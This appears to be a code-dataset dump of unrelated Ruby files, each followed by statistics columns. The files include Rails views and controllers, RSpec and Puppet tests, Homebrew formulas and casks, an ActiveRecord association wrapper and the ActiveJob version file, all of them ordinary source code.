AuxCode.init | 50.820513 | 150 | 0.752775 |
1a47c70c0c8a7e51ccc1bd92668f4f61a738fea4 | 586 | json.partial! 'cookbook', cookbook: @cookbook
json.deprecated @cookbook.deprecated
if @cookbook.deprecated? && @cookbook.replacement.present?
json.replacement api_v1_cookbook_url(@cookbook.replacement)
end
json.versions Array(@cookbook_versions_urls)
json.metrics do
json.downloads do
json.total @cookbook.download_count
json.set! :versions do
@cookbook.cookbook_versions.each do |version|
json.set! version.version, version.download_count
end
end
end
json.followers @cookbook.followers.size
json.collaborators @cookbook.collaborators.size
end
| 30.842105 | 61 | 0.771331 |
7a2a0707b4eff4ff882c0a4e3b00beb2e0798d40 | 619 | module IOCaptureHelper
def capture_io(&block)
original_stdout = $stdout
original_stderr = $stderr
captured_stdout = StringIO.new
captured_stderr = StringIO.new
$stdout = captured_stdout
$stderr = captured_stderr
yield
{
stdout: captured_stdout.string,
stderr: captured_stderr.string
}
ensure
$stdout = original_stdout
$stderr = original_stderr
end
def silent_io
original_stdout = $stdout
original_stderr = $stderr
$stdout = $stderr = StringIO.new
yield
ensure
$stdout = original_stdout
$stderr = original_stderr
end
end
| 17.685714 | 37 | 0.680129 |
4a13567db7f0709c49ee2d646775f3035809128a | 7,455 | require 'delegate'
module Deferring
  # Wraps an ActiveRecord association so that link/unlink changes are kept in
  # memory (the "deferred" objects list) and only compared against the
  # original association when needed.  Load state starts at :ghost and moves
  # to :loaded once the association's records have been copied.
  class DeferredAssociation < SimpleDelegator
    include Enumerable

    attr_reader :load_state,
                :klass,
                :parent_record,
                :inverse_name,
                :dependent

    # original_association:: the ActiveRecord association proxy to wrap
    # klass::                the associated model class (used by #build)
    # parent_record::        owner of the association
    # inverse_name::         name of the inverse association, if any
    # dependent::            the association's :dependent option
    def initialize(original_association, klass, parent_record, inverse_name, dependent)
      super(original_association)
      @load_state = :ghost
      @klass = klass
      @parent_record = parent_record
      @inverse_name = inverse_name
      @dependent = dependent
    end

    alias_method :original_association, :__getobj__

    def inspect
      objects.inspect
    end
    alias_method :pretty_inspect, :inspect

    delegate :to_s, :to_a, :inspect, :==, # methods undefined by SimpleDelegator
             :as_json, to: :objects

    def each(&block)
      objects.each(&block)
    end

    # TODO: Add explanation about :first/:last loaded? problem.
    # Until the deferred list is loaded these go straight to the database
    # association; afterwards they read the in-memory list.
    [:first, :last, :empty?, :size].each do |method|
      define_method method do
        unless objects_loaded?
          original_association.send(method)
        else
          objects.send(method)
        end
      end
    end

    # Delegates methods from Ruby's Array module to the object in the deferred
    # association.
    delegate :[]=, :[], :clear, :select!, :reject!, :flatten, :flatten!, :sort!,
             :keep_if, :delete_if, :sort_by!, :length,
             :each_index,
             to: :objects

    # Delegates Ruby's Enumerable#find method to the original association.
    #
    # The delegation has to be explicit in this case, because the inclusion of
    # Enumerable also defines the find-method on DeferredAssociation.
    def find(*args, &block)
      if block_given?
        objects.find(&block)
      else
        original_association.find(*args)
      end
    end

    # Delegates Ruby's Enumerable#count method to the original association.
    #
    # The delegation has to be explicit in this case, because the inclusion of
    # Enumerable also defines the count-method on DeferredAssociation.
    def count(*args, &block)
      if block_given?
        objects.count(*args, &block)
      else
        original_association.count(*args)
      end
    end

    # Delegates Ruby's Enumerable#select method to the original association when
    # no block has been given. Rails' select-method does not accept a block, so
    # we know that in that case the select-method has to be called on our
    # deferred association.
    #
    # The delegation has to be explicit in this case, because the inclusion of
    # Enumerable also defines the select-method on DeferredAssociation.
    def select(value = nil, &block)
      if block_given?
        objects.select { |*block_args| block.call(*block_args) }
      else
        original_association.select(value)
      end
    end

    # Rails 3.0 specific, not needed anymore for Rails 3.0+
    def set_inverse_instance(associated_record, parent_record)
      original_association.__send__(:set_inverse_instance, associated_record, parent_record)
    end

    # The in-memory list of associated records (loads it on first access).
    def objects
      load_objects
      @objects
    end

    # Replaces the in-memory list wholesale.  Sets the inverse association on
    # each record when possible, snapshots the current database records as the
    # "original" list, and fires link/unlink callbacks for the differences.
    def objects=(records)
      @objects = records.compact.map do |record|
        if inverse_name && record.class.reflect_on_association(inverse_name)
          record.send(:"#{inverse_name}=", parent_record)
        end
        record
      end
      @original_objects = original_association.to_a.clone
      objects_loaded!
      pending_deletes.each { |record| run_deferring_callbacks(:unlink, record) }
      pending_creates.each { |record| run_deferring_callbacks(:link, record) }
      @objects
    end

    # IDs of the records currently in the deferred list.
    def ids
      objects.map(&:id)
    end

    # Appends records to the deferred list, firing link callbacks and setting
    # the inverse association where available.
    def <<(*records)
      # TODO: Do we want to prevent including the same object twice? Not sure,
      # but it will probably be filtered after saving and retrieving as well.
      records.flatten.compact.uniq.each do |record|
        run_deferring_callbacks(:link, record) do
          if inverse_name && record.class.reflect_on_association(inverse_name)
            record.send(:"#{inverse_name}=", parent_record)
          end
          objects << record
        end
      end
      self
    end
    alias_method :push, :<<
    alias_method :concat, :<<
    alias_method :append, :<<

    # Removes records from the deferred list, firing unlink callbacks.
    def delete(*records)
      records.flatten.compact.uniq.each do |record|
        run_deferring_callbacks(:unlink, record) { objects.delete(record) }
      end
      self
    end

    # Removes records (given as record, id Integer, or id String) from the
    # deferred list; with a :destroy/:delete_all dependent option the record
    # is also marked for destruction on save.
    def destroy(*records)
      records.flatten.compact.uniq.each do |record|
        record = record.to_i if record.is_a? String
        record = objects.detect { |o| o.id == record } if record.is_a? Integer
        run_deferring_callbacks(:unlink, record) {
          objects.delete(record)
          record.mark_for_destruction if dependent && [:destroy, :delete_all].include?(dependent)
        }
      end
    end

    # Builds a new (unsaved) associated record and appends it to the deferred
    # list, firing link callbacks.
    def build(*args, &block)
      klass.new(*args, &block).tap do |record|
        run_deferring_callbacks(:link, record) do
          if inverse_name && record.class.reflect_on_association(inverse_name)
            record.send(:"#{inverse_name}=", parent_record)
          end
          objects.push(record)
        end
      end
    end

    # Creates a record through the underlying association and reloads the
    # deferred list so it reflects the database.
    def create(*args, &block)
      association.create(*args, &block).tap do |_|
        @load_state = :ghost
        load_objects
      end
    end

    # Like #create but raises on validation failure.
    def create!(*args, &block)
      association.create!(*args, &block).tap do |_|
        @load_state = :ghost
        load_objects
      end
    end

    # Reloads the underlying association and marks the deferred list stale so
    # the next access re-copies it.
    def reload
      original_association.reload
      @load_state = :ghost
      self
    end
    alias_method :reset, :reload

    # Returns the associated records to which links will be created after saving
    # the parent of the association.
    def links
      return [] unless objects_loaded?
      objects - original_objects
    end
    alias_method :pending_creates, :links

    # Returns the associated records to which the links will be deleted after
    # saving the parent of the assocation.
    def unlinks
      return [] unless objects_loaded?
      original_objects - objects
    end
    alias_method :pending_deletes, :unlinks

    # Returns true if there are links that will be created or deleted when
    # saving the parent of the association.
    def changed_for_autosave?
      links.any? || unlinks.any?
    end

    # Registers a before/after link/unlink callback to invoke on the parent.
    def add_callback_listener(event_name, callback_method)
      (@listeners ||= []) << DeferredCallbackListener.new(event_name, parent_record, callback_method)
    end

    private

    # The underlying association, guaranteed loaded into the deferred list.
    def association
      load_objects
      original_association
    end

    # Copies the association's records into @objects and snapshots them
    # (frozen) as @original_objects.  No-op once loaded.
    def load_objects
      return if objects_loaded?
      @objects = original_association.to_a.clone
      @original_objects = @objects.clone.freeze
      objects_loaded!
    end

    def objects_loaded?
      @load_state == :loaded
    end

    def objects_loaded!
      @load_state = :loaded
    end

    # Snapshot of the records as they were when first loaded (or last
    # assigned); used to compute links/unlinks.
    def original_objects
      load_objects
      @original_objects
    end

    # Wraps an operation in before_/after_<event> callback notifications.
    def run_deferring_callbacks(event_name, record)
      notify_callback_listeners(:"before_#{event_name}", record)
      yield if block_given?
      notify_callback_listeners(:"after_#{event_name}", record)
    end

    def notify_callback_listeners(event_name, record)
      @listeners && @listeners.each do |listener|
        if listener.event_name == event_name
          listener.public_send(event_name, record)
        end
      end
    end
  end
end
| 28.346008 | 101 | 0.64896 |
79211375427b92e0454512790eab812a1971760d | 445 | #
# Cookbook Name:: mirna
# Spec:: default
#
# Copyright (c) 2015 The Authors, All Rights Reserved.
require 'spec_helper'
describe 'mirna::default' do
  context 'When all attributes are default, on an unspecified platform' do
    # Build and converge an in-memory Chef run for the recipe under test.
    let(:chef_run) { ChefSpec::ServerRunner.new.converge(described_recipe) }

    it 'converges successfully' do
      chef_run # This should not raise an error
    end
  end
end
| 18.541667 | 74 | 0.696629 |
7a0d3599d66743b1d6465a748cab0a7ddb059e8f | 342 | require 'spec_helper_acceptance'
describe 'export_policy' do
  it 'makes a export_policy' do
    # Puppet manifest applied to the device under test: the vserver node
    # declares a netapp_export_policy resource; the vsim node is a no-op.
    pp=<<-EOS
node 'vsim-01' {
}
node 'vserver-01' {
  netapp_export_policy { 'export_policy-test' :
    ensure => present,
  }
}
    EOS
    make_site_pp(pp)
    # First run must apply the change; second run must be idempotent.
    run_device(:allow_changes => true)
    run_device(:allow_changes => false)
  end
end
| 18 | 47 | 0.675439 |
ac31a936eb6887252582b90f2168610f834172c5 | 362 | class Sshfs < Cask
version '2.5.0'
sha256 'f8f4f71814273ea42dbe6cd92199f7cff418571ffd1b10c0608878d3472d2162'
url "https://github.com/osxfuse/sshfs/releases/download/osxfuse-sshfs-#{version}/sshfs-#{version}.pkg"
homepage 'http://osxfuse.github.io/'
license :oss
pkg "sshfs-#{version}.pkg"
uninstall :pkgutil => 'com.github.osxfuse.pkg.SSHFS'
end
| 30.166667 | 104 | 0.748619 |
288ac7d8baeac5e423cfc1fc9330dc1df6a9d589 | 2,533 | require File.join(File.dirname(__FILE__), 'test_helper')
# Minimal model bound to the test table used by AutoIncrementTest.
class Sample < ActiveRecord::Base
  self.table_name = 'sample' # singular table name, so set it explicitly
end
# Verifies that column comments can be set on a primary key without
# clobbering (or while deliberately removing) its AUTO_INCREMENT behavior.
class AutoIncrementTest < Minitest::Test
  include TestHelper

  def test_basic_table_creation
    assert_auto_increments
  end

  # Setting a comment on the primary key must preserve auto increment.
  def test_modified_primary_key_with_auto_increment
    comment_text = "a comment on the sample table in the primary_key field"
    result_comment = nil
    ActiveRecord::Schema.define do
      set_column_comment :sample, :id, comment_text
      result_comment = retrieve_column_comment :sample, :id
    end
    assert_auto_increments
    assert_equal comment_text, result_comment
  end

  # Explicitly disabling auto increment must stick while the comment is set.
  def test_modified_primary_key_without_auto_increment
    comment_text = "a comment on the sample table in the primary_key field"
    result_comment = nil
    ActiveRecord::Schema.define do
      change_column :sample, :id, :integer, auto_increment: false
      set_column_comment :sample, :id, comment_text
      result_comment = retrieve_column_comment :sample, :id
    end
    assert_does_not_auto_increment
    assert_equal comment_text, result_comment
  end

  private

  # Inserts a row with an explicit id and asserts it is stored verbatim
  # (i.e. the database did not generate its own value).  On MySQL also
  # checks the column's Extra metadata lacks auto_increment.
  def assert_does_not_auto_increment
    if ENV['DB'] == 'mysql'
      extra = extract_extra_attributes('id')
      refute_match(/auto_increment/i, extra)
    end
    id = nil
    ActiveRecord::Base.connection.instance_eval do
      execute "INSERT INTO #{quote_table_name :sample} (#{quote_column_name :id}, #{quote_column_name :field1}, #{quote_column_name :field2}) VALUES (15, 'text3', 11)"
      id = select_value("SELECT #{quote_column_name :id} FROM #{quote_table_name :sample}").to_i
    end
    assert_equal 15, id
  end

  # Inserts rows without an id and asserts the database assigned 1, 2, 3.
  # On MySQL also checks the column's Extra metadata shows auto_increment.
  def assert_auto_increments
    if ENV['DB'] == 'mysql'
      extra = extract_extra_attributes('id')
      assert_match(/auto_increment/i, extra)
    end
    ids = []
    ActiveRecord::Base.connection.instance_eval do
      3.times do |n|
        execute "INSERT INTO #{quote_table_name :sample} (#{quote_column_name :field1}, #{quote_column_name :field2}) VALUES ('text#{n}', #{n})"
      end
      ids = select_rows("SELECT #{quote_column_name :id} FROM #{quote_table_name :sample}").map{|r| r.first.to_i }.sort
    end
    assert_equal [1,2,3], ids
    assert_equal Sample.count, 3
  end

  # Returns the MySQL "Extra" metadata string for +field_name+ on the
  # sample table (e.g. "auto_increment").  MySQL-only helper.
  def extract_extra_attributes(field_name)
    ActiveRecord::Base.connection.instance_eval do
      execute_and_free("SHOW FULL FIELDS FROM #{quote_table_name :sample}") do |result|
        each_hash(result).detect{|field| field[:Field] == field_name}[:Extra]
      end
    end
  end
end
4a52eb0ef7d5a8b4fb2092b2987a11eb22d22444 | 1,272 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module Shell
  module Commands
    # HBase shell command: assigns visibility-label authorizations to a user
    # or group via the visibility labels admin.
    class SetAuths < Command
      # Help text printed by the shell; keep the heredoc content verbatim,
      # it is user-facing output.
      def help
        return <<-EOF
Add a set of visibility labels for a user or group
Syntax : set_auths 'user',[label1, label2]
For example:
hbase> set_auths 'user1', ['SECRET','PRIVATE']
hbase> set_auths '@group1', ['SECRET','PRIVATE']
EOF
      end

      # user:: user name, or group name prefixed with '@'
      # args:: the labels to grant
      def command(user, *args)
        format_simple_command do
          visibility_labels_admin.set_auths(user, args)
        end
      end
    end
  end
end
| 31.02439 | 74 | 0.720126 |
e87e9a87caf2b45e803c20ad4372406f85b67987 | 598 | cask 'virtualhostx' do
version '7.3.0,7_19'
sha256 '0ae7cef8c94d48eb2ebd63df7bae8422c68f3801b8412d2f67d7f80e8e9104ce'
# downloads-clickonideas.netdna-ssl.com/virtualhostx was verified as official when first introduced to the cask
url "https://downloads-clickonideas.netdna-ssl.com/virtualhostx/virtualhostx#{version.after_comma}.zip"
appcast 'https://shine.clickontyler.com/appcast.php?id=33',
checkpoint: 'e6ff3d5015f7c35f72c44f433656ecc7fefb76fc947b9d5ebf516338b62e2425'
name 'VirtualHostX'
homepage 'https://clickontyler.com/virtualhostx/'
app 'VirtualHostX.app'
end
| 42.714286 | 113 | 0.801003 |
4a29b560f1211a937cba39839cc95c3aabd1923a | 1,507 | RSpec.describe ExceedingRequestsController, type: :controller do
let!(:user) { create(:user) }
let!(:account) { create(:account) }
let!(:account_user) do
create(:account_user,
user_id: user.id,
account_id: account.id,
role_id: Role.find_by(name: 'owner').id
)
end
before { sign_in user }
describe 'POST create' do
context 'with valid params' do
it 'would create request if it was created in new limit period' do
post :create, params: { account_id: account.id, exceeding_request: { amount: 1 } }
Timecop.freeze(Date.today + 1) do
post :create, params: { account_id: account.id, exceeding_request: { amount: 2 } }
end
expect(ExceedingRequest.count).to eq(2)
end
end
context 'with invalid params' do
it 'would not create request if it was created in current limit period' do
post :create, params: { account_id: account.id, exceeding_request: { amount: 1 } }
post :create, params: { account_id: account.id, exceeding_request: { amount: 2 } }
expect(ExceedingRequest.count).to eq(1)
end
end
end
describe 'DELETE destroy' do
it 'will delete request from table' do
req = ExceedingRequest.new(amount: 10)
req.account_user = account_user
req.save!
count = ExceedingRequest.count
delete :destroy, params: { account_id: account.id, id: req.id }
expect(ExceedingRequest.count).to eq(count - 1)
end
end
end
| 33.488889 | 92 | 0.643663 |
91ad1d5870affd769a1e223569ffa3f98a022fbb | 383 | require_dependency 'spree/shipping_calculator'
module Spree
  module Calculator::Shipping
    # Shipping calculator for orders collected from a self-delivery point.
    class SelfDelivery < Spree::ShippingCalculator
      def self.description
        I18n.t :self_delivery
      end

      # Returns the cost of the order's self-delivery point, or 0 when
      # no point (or no cost) is set. Accepts either an order or any
      # object that responds to #order.
      def compute(object)
        order = object.is_a?(Spree::Order) ? object : object.order
        order.self_delivery_point.try(:cost) || 0
      end
    end
  end
end
| 21.277778 | 66 | 0.686684 |
33f15c42ff14c29b73b06780371ac063b5ea18ed | 605 | =begin
Mojang API
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator)
OpenAPI spec version: 2020-06-05
Generated by: https://github.com/openapitools/openapi-generator.git
=end
# Generated stub controller for the Mojang name-history endpoints; each
# action currently just acknowledges the request with a fixed JSON payload.
class NameHistoryController < ApplicationController
  def find_unique_ids_by_name
    # Your code here
    render json: {"message" => "yes, it worked"}
  end

  def get_name_history
    # Your code here
    render json: {"message" => "yes, it worked"}
  end

  def get_unique_id_by_name
    # Your code here
    render json: {"message" => "yes, it worked"}
  end
end
| 20.166667 | 106 | 0.722314 |
910fe5a877e9bb8a0869bbd99bfc78edf4235d15 | 1,726 | class Yamllint < Formula
include Language::Python::Virtualenv
desc "Linter for YAML files"
homepage "https://github.com/adrienverge/yamllint"
url "https://github.com/adrienverge/yamllint/archive/v1.11.1.tar.gz"
sha256 "56221b7c0a50b1619e491eb157624a5d1b160c1a4f019d64f117268f42fe4ca4"
revision 1
bottle do
cellar :any
rebuild 1
sha256 "3ffaafca879769be72b0a8a98be07f8ffe746f8488f4430863fb8380544ab01c" => :high_sierra
sha256 "921109aebc30770d96997b33565faf1d21f5821d4bf9e19d18fc6e0f5908712a" => :sierra
sha256 "17ec47b0462e157f33a61fa95462c1b6f7bdd329fd687a870317c4eb4aeeaf9c" => :el_capitan
sha256 "08c77688d24055fa4c35485923d55755e087b8d87d1691eca3be8f791dacae45" => :x86_64_linux
end
depends_on "libyaml"
depends_on "python"
resource "PyYAML" do
url "https://files.pythonhosted.org/packages/9e/a3/1d13970c3f36777c583f136c136f804d70f500168edc1edea6daa7200769/PyYAML-3.13.tar.gz"
sha256 "3ef3092145e9b70e3ddd2c7ad59bdd0252a94dfe3949721633e41344de00a6bf"
end
resource "pathspec" do
url "https://files.pythonhosted.org/packages/5e/59/d40bf36fda6cc9ec0e2d2d843986fa7d91f7144ad83e909bcb126b45ea88/pathspec-0.5.6.tar.gz"
sha256 "be664567cf96a718a68b33329862d1e6f6803ef9c48a6e2636265806cfceb29d"
end
def install
virtualenv_install_with_resources
end
test do
(testpath/"bad.yaml").write <<~EOS
---
foo: bar: gee
EOS
output = shell_output("#{bin}/yamllint -f parsable -s bad.yaml", 1)
assert_match "syntax error: mapping values are not allowed here", output
(testpath/"good.yaml").write <<~EOS
---
foo: bar
EOS
assert_equal "", shell_output("#{bin}/yamllint -f parsable -s good.yaml")
end
end
| 33.843137 | 138 | 0.765353 |
331ad2419a6e525fc33c4754bf9db6661d99b47b | 90 | class Management::Admin::ShippersController < ApplicationController
def index; end
end
| 18 | 67 | 0.811111 |
18a635135167946f236bcb9f4912d8ec5877a48c | 2,116 | class Geeqie < Formula
desc "Lightweight Gtk+ based image viewer"
homepage "http://www.geeqie.org/"
# URL needs to be an unshallow clone because it needs history to generate
# the changelog documentation.
# Unfortunately this means that the tarball can't be used to build;
# this is documented in the makefile.
url "https://github.com/BestImageViewer/geeqie.git",
:tag => "v1.4",
:revision => "7c9b41e7c9be8cfc9b4f0a2459c0a1e0e4aaea5b",
:shallow => false
revision 1
bottle do
sha256 "a559b5497adfaadb9ae785d47abf74f856ee0aa34126325a380565a0ec6836ad" => :mojave
sha256 "0bf35c40d3d0fc9a3bb6d69cd079e7e3f9aae4d1c050cead01aca59bea009d22" => :high_sierra
sha256 "54a1af6f886c7a95b3f66ea0996a6acfa1531b940d274921a84cdef57c1fc54f" => :sierra
sha256 "2f84465d9d6eba2db0031c71033b735d33a6d6294dd2a15fd13d65674b60783b" => :el_capitan
end
# Fixes the build on OS X by assigning a value to a variable
# before passing to WEXITVALUE.
# https://github.com/BestImageViewer/geeqie/pull/589
patch do
url "https://raw.githubusercontent.com/Homebrew/patches/9cacfd49be1db430d7a956132d6521e23fc85f77/geeqie/wexitstatus_fix.diff"
sha256 "00bad28d46aafaaed99965a5c054bf04679c100c6f4f13ee82cf83c2782de349"
end
depends_on "autoconf" => :build
depends_on "automake" => :build
depends_on "intltool" => :build
depends_on "pkg-config" => :build
depends_on "adwaita-icon-theme"
depends_on "atk"
depends_on "cairo"
depends_on "exiv2"
depends_on "gdk-pixbuf"
depends_on "gettext"
depends_on "glib"
depends_on "gtk+3"
depends_on "imagemagick"
depends_on "jpeg"
depends_on "libtiff"
depends_on "little-cms2"
depends_on "pango"
def install
ENV["NOCONFIGURE"] = "yes"
system "./autogen.sh"
system "./configure", "--disable-dependency-tracking",
"--prefix=#{prefix}",
"--disable-glibtest",
"--disable-gtktest",
"--enable-gtk3"
system "make", "install"
end
test do
system "#{bin}/geeqie", "--version"
end
end
| 34.129032 | 129 | 0.702268 |
bbd6d06da672f7a14cd87b0e14a905c4e318c877 | 9,716 | require 'spec_helper'
require 'fixtures/unit/puppet/provider/brocade_alias_membership/brocade_alias_membership_fixture'
# Unit tests for the Brocade alias-membership provider (legacy RSpec
# `should`/`stub` syntax). Each example stubs the switch transport, pins
# the exact CLI command issued, and checks how the response text maps to
# create/destroy/exists? outcomes.
describe "Brocade Alias Membership Provider" do
  #Given
  before(:each) do
    @fixture = Brocade_alias_membership_fixture.new
    mock_transport=double('transport')
    @fixture.provider.stub(:transport).and_return(mock_transport)
    Puppet.stub(:info)
    Puppet.stub(:debug)
  end

  # Basic shape of the provider class.
  context "when brocade alias membership provider is created " do
    it "should have parent 'Puppet::Provider::Brocade_fos'" do
      @fixture.provider.should be_kind_of(Puppet::Provider::Brocade_fos)
    end

    it "should have create method defined for brocade alias membership" do
      @fixture.provider.class.instance_method(:create).should_not == nil
    end

    it "should have destroy method defined for brocade alias membership" do
      @fixture.provider.class.instance_method(:destroy).should_not == nil
    end

    it "should have exists? method defined for brocade_alias_membership" do
      @fixture.provider.class.instance_method(:exists?).should_not == nil
    end
  end

  # create: command construction, error paths, and cfg_save behaviour.
  context "when brocade alias membership is created" do
    before(:each) do
      @createInfoMsg = Puppet::Provider::Brocade_messages::ALIAS_MEMBERSHIP_ALREADY_EXIST_INFO%[@fixture.get_member_name,@fixture.get_alias_name]
    end

    it "should raise error if response contains 'not found' while creating brocade alias membership" do
      #Then
      @fixture.provider.transport.should_receive(:command).once.with(Puppet::Provider::Brocade_commands::ALIAS_MEMBER_ADD_COMMAND%[@fixture.get_alias_name,@fixture.get_member_name],NOOP_HASH).and_return(Puppet::Provider::Brocade_responses::RESPONSE_NOT_FOUND)
      @fixture.provider.should_not_receive(:cfg_save)
      #When
      expect {@fixture.provider.create}.to raise_error(Puppet::Error)
    end

    it "should raise error if response contains 'invalid' while creating brocade alias membership" do
      #Then
      @fixture.provider.transport.should_receive(:command).once.with(Puppet::Provider::Brocade_commands::ALIAS_MEMBER_ADD_COMMAND%[@fixture.get_alias_name,@fixture.get_member_name], NOOP_HASH).ordered.and_return(Puppet::Provider::Brocade_responses::RESPONSE_INVALID)
      @fixture.provider.should_not_receive(:cfg_save)
      #When
      expect {@fixture.provider.create}.to raise_error(Puppet::Error)
    end

    it "should warn if brocade alias membership already exists" do
      #Then
      @fixture.provider.transport.should_receive(:command).once.with(Puppet::Provider::Brocade_commands::ALIAS_MEMBER_ADD_COMMAND%[@fixture.get_alias_name,@fixture.get_member_name], NOOP_HASH).ordered.and_return(Puppet::Provider::Brocade_responses::RESPONSE_ALREADY_CONTAINS)
      Puppet.should_receive(:info).once.ordered.with(@createInfoMsg).and_return("")
      @fixture.provider.should_not_receive(:cfg_save)
      #When
      @fixture.provider.create
    end

    it "should save the configuration, if brocade alias membership is created successfully" do
      #Then
      @fixture.provider.transport.should_receive(:command).once.with(Puppet::Provider::Brocade_commands::ALIAS_MEMBER_ADD_COMMAND%[@fixture.get_alias_name,@fixture.get_member_name], NOOP_HASH).ordered.and_return("")
      @fixture.provider.should_receive(:cfg_save).once
      #When
      @fixture.provider.create
    end
  end

  # destroy: command construction, error paths, and cfg_save behaviour.
  context "when brocade alias membership is deleted" do
    before(:each) do
      @destroyInfoMsg = Puppet::Provider::Brocade_messages::ALIAS_MEMBERSHIP_ALREADY_REMOVED_INFO%[@fixture.get_member_name,@fixture.get_alias_name]
    end

    it "should save the configuration, if brocade alias membership is deleted successfully" do
      #Then
      @fixture.provider.transport.should_receive(:command).once.with(Puppet::Provider::Brocade_commands::ALIAS_MEMBER_REMOVE_COMMAND%[@fixture.get_alias_name,@fixture.get_member_name], NOOP_HASH).ordered.and_return("")
      @fixture.provider.should_receive(:cfg_save).once.ordered
      #When
      @fixture.provider.destroy
    end

    it "should warn if brocade alias name does not exist" do
      #Then
      @fixture.provider.transport.should_receive(:command).once.with(Puppet::Provider::Brocade_commands::ALIAS_MEMBER_REMOVE_COMMAND%[@fixture.get_alias_name,@fixture.get_member_name], NOOP_HASH).ordered.and_return(Puppet::Provider::Brocade_responses::RESPONSE_IS_NOT_IN)
      Puppet.should_receive(:info).once.ordered.with(@destroyInfoMsg).and_return("")
      @fixture.provider.should_not_receive(:cfg_save)
      #When
      @fixture.provider.destroy
    end

    it "should raise error if response contains 'does not exist' while deleting the brocade alias membership" do
      #Then
      @fixture.provider.transport.should_receive(:command).once.with(Puppet::Provider::Brocade_commands::ALIAS_MEMBER_REMOVE_COMMAND%[@fixture.get_alias_name,@fixture.get_member_name], NOOP_HASH).ordered.and_return(Puppet::Provider::Brocade_responses::RESPONSE_DOES_NOT_EXIST)
      @fixture.provider.should_not_receive(:cfg_save)
      #When
      expect {@fixture.provider.destroy}.to raise_error(Puppet::Error)
    end

    it "should raise error if response contains 'is not in' while deleting the brocade alias membership" do
      #Then
      @fixture.provider.transport.should_receive(:command).once.with(Puppet::Provider::Brocade_commands::ALIAS_MEMBER_REMOVE_COMMAND%[@fixture.get_alias_name,@fixture.get_member_name], NOOP_HASH).and_return(Puppet::Provider::Brocade_responses::RESPONSE_IS_NOT_IN)
      Puppet.should_receive(:info).once.ordered.with(Puppet::Provider::Brocade_messages::ALIAS_MEMBERSHIP_ALREADY_REMOVED_INFO%[@fixture.get_member_name,@fixture.get_alias_name])
      @fixture.provider.should_not_receive(:cfg_save)
      #When
      @fixture.provider.destroy
    end
  end

  # exists?: interpretation of aliShow output for both ensure values.
  context "when brocade alias membership existence is validated" do
    it "should warn if brocade alias name does not exist and when ensure property is given present" do
      @fixture.provider.transport.should_receive(:command).once.with(Puppet::Provider::Brocade_commands::ALIAS_SHOW_COMMAND%[@fixture.get_alias_name], NOOP_HASH).ordered.and_return(Puppet::Provider::Brocade_responses::RESPONSE_DOES_NOT_EXIST)
      Puppet.should_receive(:info).once.with(Puppet::Provider::Brocade_messages::ALIAS_DOES_NOT_EXIST_INFO%[@fixture.get_alias_name])
      @fixture.provider.exists?.should == true
    end

    it "should warn if brocade alias name does not exist and when ensure property is given absent" do
      @fixture.set_ensure_value_absent
      @fixture.provider.transport.should_receive(:command).once.with(Puppet::Provider::Brocade_commands::ALIAS_SHOW_COMMAND%[@fixture.get_alias_name], NOOP_HASH).ordered.and_return(Puppet::Provider::Brocade_responses::RESPONSE_DOES_NOT_EXIST)
      Puppet.should_receive(:info).once.with(Puppet::Provider::Brocade_messages::ALIAS_DOES_NOT_EXIST_INFO%[@fixture.get_alias_name])
      @fixture.provider.exists?.should == false
    end

    it "should return false if brocade alias name exist and wwpn is not associated to it when ensure property is given present" do
      @fixture.provider.transport.should_receive(:command).once.with(Puppet::Provider::Brocade_commands::ALIAS_SHOW_COMMAND%[@fixture.get_alias_name], NOOP_HASH).ordered.and_return("")
      @fixture.provider.exists?.should == false
    end

    it "should return true if brocade alias name exist and wwpn is associated to it when ensure property is given present" do
      @fixture.provider.transport.should_receive(:command).once.with(Puppet::Provider::Brocade_commands::ALIAS_SHOW_COMMAND%[@fixture.get_alias_name], NOOP_HASH).ordered.and_return(@fixture.get_member_name)
      @fixture.provider.exists?.should == true
    end

    it "should warn if brocade alias name exist and wwpn is associated to it when ensure property is given present" do
      @fixture.provider.transport.should_receive(:command).once.with(Puppet::Provider::Brocade_commands::ALIAS_SHOW_COMMAND%[@fixture.get_alias_name], NOOP_HASH).ordered.and_return(@fixture.get_member_name)
      Puppet.should_receive(:info).once.with(Puppet::Provider::Brocade_messages::ALIAS_MEMBERSHIP_ALREADY_EXIST_INFO%[@fixture.get_member_name,@fixture.get_alias_name])
      @fixture.provider.exists?.should == true
    end

    it "should return true if brocade alias name exist and wwpn is associated to it when ensure property is given absent" do
      @fixture.set_ensure_value_absent
      @fixture.provider.transport.should_receive(:command).once.with(Puppet::Provider::Brocade_commands::ALIAS_SHOW_COMMAND%[@fixture.get_alias_name], NOOP_HASH).ordered.and_return(@fixture.get_member_name)
      @fixture.provider.exists?.should == true
    end

    it "should return false if brocade alias name exist and wwpn is not associated to it when ensure property is given absent" do
      @fixture.set_ensure_value_absent
      @fixture.provider.transport.should_receive(:command).once.with(Puppet::Provider::Brocade_commands::ALIAS_SHOW_COMMAND%[@fixture.get_alias_name], NOOP_HASH).ordered.and_return("")
      @fixture.provider.exists?.should == false
    end

    it "should warn if brocade alias name exist and wwpn is not associated to it when ensure property is given absent" do
      @fixture.set_ensure_value_absent
      @fixture.provider.transport.should_receive(:command).once.with(Puppet::Provider::Brocade_commands::ALIAS_SHOW_COMMAND%[@fixture.get_alias_name], NOOP_HASH).ordered.and_return("")
      Puppet.should_receive(:info).once.with(Puppet::Provider::Brocade_messages::ALIAS_MEMBERSHIP_ALREADY_REMOVED_INFO%[@fixture.get_member_name,@fixture.get_alias_name])
      @fixture.provider.exists?.should == false
    end
  end
end
| 52.804348 | 276 | 0.771511 |
1814ac21db34e8534fe6b18eead86b82a0ca0fe9 | 344 | # frozen_string_literal: true
module ActiveJob
  # Version number components, joined below into the canonical string.
  module VERSION
    MAJOR = 6
    MINOR = 1
    TINY  = 4
    PRE   = "4"

    STRING = [MAJOR, MINOR, TINY, PRE].compact.join(".")
  end

  # Returns the version of the currently loaded Active Job as a <tt>Gem::Version</tt>
  def self.gem_version
    Gem::Version.new(VERSION::STRING)
  end
end
